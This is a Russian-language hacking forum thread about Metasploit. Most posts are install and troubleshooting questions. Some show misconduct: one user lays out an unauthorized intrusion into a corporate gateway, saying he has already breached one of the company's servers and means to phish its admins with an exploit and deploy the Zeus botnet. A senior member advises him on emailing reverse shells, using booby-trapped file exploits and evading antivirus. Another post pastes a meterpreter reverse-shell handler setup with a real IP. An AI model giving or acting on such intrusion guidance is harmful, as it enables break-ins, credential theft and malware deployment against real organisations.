Авторские статьи Metasploit Framework для ламеров

Discussion in 'Статьи' started by -=lebed=-, 11 Jul 2006.

?
  1. Да, пользуюсь и доволен.

    51.2%
  2. Нет, он меня не устраивает, не нужен и т. п.

    14.8%
  3. А что это?

    34.0%
  1. burunduk_99rus

    burunduk_99rus New Member

    Joined:
    27 Feb 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Установил Metasploit3.2 обновил Oniine Update запускаю Metasploit 3GUI выдает (Точка входа в процедуру XmlInitUnknownEncoding NS не найдена в библиотеке DLL xmlparsa.dll) в Metasploit 3Web входит. А запускаю с Development вобще не запускается.
    Пошел другим путем. Скачал с оф сайта metasploit3.3 установил,обновил стала запускатся но при вводе в console (use ms08_067_netapi пишет failed to load module) подскажите в чем проблема?
     
  2. J0cker

    J0cker New Member

    Joined:
    27 Feb 2010
    Messages:
    62
    Likes Received:
    4
    Reputations:
    0
    Вообще какое отличие команд в cmd !?Допустим на удаленной машине тупо даж start calc не выполняется или надо полный путь прописывать к файлу ? Не думаю что это так просто не понимаю разницы выполнения команд в моем cmd и в cmd жертвы
     
  3. elborn

    elborn New Member

    Joined:
    17 Dec 2010
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    ребят, столкнулся с такой проблемой, после указания всех параметров, появляется такая строка (running) и на этом весе заканчивается, тоесть ждать можно до бесконечности, как бы все запускается но я в этом сомневаюсь, слишком уж долго. Вот все команды, я думаю помогут

    >> use multi/handler
    >> set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    >> set LHOST 46.0.138.16
    LHOST => 46.0.138.16
    >> exploit
    [*] Started reverse handler
    [*] Starting the payload handler...(running)
    >> exploit
    [*] Started reverse handler
    [*] Starting the payload handler...
    (running)

    PS ver 3.2
     
  4. Ph1ex0n

    Ph1ex0n New Member

    Joined:
    30 Dec 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Вопрос на засыпку

    Установил msf 3.6.
    Цель - корпоративный шлюз в инет. На нем радмин стоит.
    WS2003 принципиально не обновляется (да, такие идиоты еще есть). Каспер ИС.
    Сканировал XSpider'ом:
    TCP порты
    - открытые : 2
    - закрытые : 1
    - недоступные : 65532
    - порт 25/tcp
    сервер SMTP - отправка почты (не работает)
    - порт 110/tcp
    сервер POP3 - получение почты (не работает)
    Исходя из этих данных, уважаемые местные старожилы, какой бы эксплойт предложили подсунуть msf в первую очередь?
    Крайне интересует мнение lebed. Готов поделиться трофеями.
     
  5. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    1. Кто не обновляет систему регулярно - совсем не идиоты, а как раз наоборот (сервер часто падает после обновления, особенно если версия пиратка). Так что выключить автоматическое обновление и не доверять БГ- просто обязанность каждого норм. админа.
    2. Открыто всего два порта, поэтому дело глухо, т.е. атака на сервисы не прокатит.
    3. Тут мне видится один вариант взлома - засылка реверсшелла на почту сервера + СИ чтоб его запустили, либо отсылка сплоитов начинённых реверс-шеллом (анимированные курсоры, тот жe WMF, сплоит использующий относительно новый баг в обработке иконок и т.п.). Т.е. ломать надо изнутри + обезвредить, либо обойти KIS при этом, что не так просто сделать...
     
  6. JohnnyBGoode

    JohnnyBGoode Member

    Joined:
    5 Oct 2010
    Messages:
    48
    Likes Received:
    11
    Reputations:
    5
    Если сессия создается,но через несколько секунд сама закрывается,значит дело в том что уязвимости нет ?
     
  7. Ph1ex0n

    Ph1ex0n New Member

    Joined:
    30 Dec 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    2-=lebed=-

    Спорно, но не суть. На самом деле там не обновляется даже винда на рабочих станциях. Я уже проник на один из их серверов. Это второй, самый вкусный, через него видна вся локальная сеть.

    Там ещё один порт открыт - 4899, но экспайдер его не видит.

    Будешь смеяться, но я тоже так подумал. Задумка такая - тут открылась новая дыра в MS 2003-м - http://www.cybersecurity.ru/news/112031.html, в принципе, у меня есть мыло админов, может прокатить эксплойт ms11_xxx_createsizeddibsection.rb плюс СИ, разумеется. Далее - какую прогу запускать - или из реестра вытащить хеш радминовского пароля или не мелочиться и развернуть зевс, есть у меня старенькая версия. Как его разворачивать ещё не знаю, но думаю справлюсь.
    Как тебе такой вариант?

    ps Насчёт КИСа уже не уверен, но вот нод32 точно есть.
    pps Я его точно сломаю, только пока не знаю как, есть у меня такое горячее желание.
     
  8. DarkMist

    DarkMist Elder - Старейшина

    Joined:
    20 Feb 2007
    Messages:
    201
    Likes Received:
    24
    Reputations:
    0
    подскажите в версии 3.5 есть веб интерфейс?? поставил а запускается только консоль...
     
  9. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    у когонибудь была такая проблема, что в консольном режиме печатает только русскими буквами? И если да, то как её решить?
     
  10. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    зевс - как бы ботнет, хочешь админку его туда поставить? :confused:
    P.S. Пробуй разные сплоиты. (отсылка на мыло и т.п.)
    P.P.S. У меня опера последняя пробилась на автосерфинге одном, стоял KIS6 с последними базами, Каспер запалил конечно проникновение, часть локнул, убил, но один процессик не убиваемый, запускаемый через rundll32 с названием opera.exe остался в памяти.
     
    #310 -=lebed=-, 15 Jan 2011
    Last edited: 15 Jan 2011
  11. Ph1ex0n

    Ph1ex0n New Member

    Joined:
    30 Dec 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    См. личку.
     
  12. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    такая проблема. Допустим я если сканю хСпайдером определенный ип, то он выдаёт его открытые порты, и уязвимости. А если я прописываю в метасплоите пишу db_nmap и этот адрес, то он выдаёт типо он адрес мертовый и всё. Что делать?
    (П.С. Если допустим я подключаюсь с Удаленого рабочего стола на этот ип с портом 3389 то всё какбы нормально. Как в нмпапе указать порт?
     
    #312 Cherep, 26 Jan 2011
    Last edited: 26 Jan 2011
  13. pyaniyMACTEP

    pyaniyMACTEP New Member

    Joined:
    6 Jan 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Подскажите что значит ошибка - Failed to load the OCI library: no such file to load -- oci8
    и что это OCI library? версия Framework 3.5.2.
     
    #313 pyaniyMACTEP, 15 Feb 2011
    Last edited: 15 Feb 2011
  14. Odolinsky

    Odolinsky New Member

    Joined:
    26 Jan 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    ребят, если сканировать IP диапозоны и искать хосты нужно ли IP свой прятать при помощи дедика или VPNа ???
     
  15. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Если сетка пентагона - то да - нужно, если школы за углом - то имхо лишнее :D
     
  16. killakolla

    killakolla New Member

    Joined:
    22 Dec 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    ms 3.5.2

    Такая проблема: Посотавил свежий 3.5.2 релиз (окна), запускаю консоль, НЕ печатает (просто не реагирует на нажатия клавиш). В чем может быть дело? (ставил на eng xp)
     
  17. pahom

    pahom New Member

    Joined:
    16 Mar 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте подскажите можно ли с помощью метасплоита эксплуатировать машины не в локальной сети, если да то какие настройки нада прописывать(я сижу под натом) напримере этого эксплоита server/browser_autopwn Заранее спасибо
     
  18. ConnectOFF

    ConnectOFF New Member

    Joined:
    13 Apr 2011
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Помогите запустить MFS3.6.0 на Ubuntu... не могу запустить mfsconsole =( вообще что делать то надо.. компилировать?? если да то нету файлов для компиляции..(
     
  19. dupD0M

    dupD0M Elder - Старейшина

    Joined:
    18 May 2010
    Messages:
    1,130
    Likes Received:
    74
    Reputations:
    34
    ну его так то сперва установить надо наверо :) и почитать на офф сайте
     
  20. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Ставь на Win - там всё без заморочек.